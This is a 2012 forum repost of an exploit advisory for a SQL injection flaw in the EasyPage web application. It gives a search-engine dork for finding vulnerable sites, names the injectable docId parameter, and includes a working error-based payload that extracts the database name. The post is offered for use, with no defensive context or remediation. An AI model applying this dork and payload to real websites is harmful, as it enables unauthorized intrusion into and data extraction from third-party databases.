The_Arhitect Posted January 20, 2012 Report Posted January 20, 2012 EasyPage SQL Injection Vulnerability# # Title : EasyPage SQL Injection Vulnerability# Author : Red Security TEAM# Date : 19/01/2012# Risk : High# Vendor : http://karait.com/# Tested On : Windows Server 2008 (Microsoft-IIS/7.5)# Dork : inurl:default.aspx?page=Document&app=Documents&docId=*# Contact : Info [ 4t ] RedSecurity [ d0t ] COM# Home : http://RedSecurity.COM## Exploit :# http://server/default.aspx?page=Document&app=Documents&docId=[SQLi]## Example : ## [Get Database Name]# http://server/default.aspx?page=Document&app=Documents&docId=convert(int,db_name() COLLATE SQL_Latin1_General_Cp1254_CS_AS) and 1=1# Sursa: EasyPage SQL Injection Vulnerability Quote
